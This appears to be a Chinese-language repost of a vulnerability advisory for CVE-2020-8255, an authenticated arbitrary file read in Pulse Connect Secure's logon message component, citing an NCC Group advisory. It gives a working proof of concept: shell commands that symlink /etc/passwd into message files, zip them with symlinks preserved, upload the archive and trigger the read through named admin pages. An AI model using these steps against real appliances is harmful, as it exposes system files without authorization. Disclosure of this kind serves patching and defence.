# CVE-2020-8255 Pulse Connect Secure通过登录消息组件实现任意文件读取
概述:
Pulse Connect Secure在登录前/后消息组件中存在任意文件读取漏洞。经过身份验证的管理用户可以利用此漏洞从底层操作系统读取任意文件。
PoC:
“`bash
首先创建en.txt和default.txt文件:
ln -s /etc/passwd default.txt
ln -s /etc/passwd en.txt
使用–symlinks选项压缩文件:
zip –symlinks logon.zip default.txt en.txt
adding: default.txt (stored 0%)
adding: en.txt (stored 0%)
“`
通过/dana-admin/auth/signinNotif.cgi页面上传zip包,最后通过/dana-admin/auth/signinPolicy.cgi触发任意文件读取。
![](/static/lingjiao/media/16097309753555/16097310084538.jpg)
ref:
https://research.nccgroup.com/2020/10/26/technical-advisory-pulse-connect-secure-arbitrary-file-read-via-logon-message-cve-2020-8255/
https://forum.ywhack.com/thread-114616-1-6.html
请登录后查看评论内容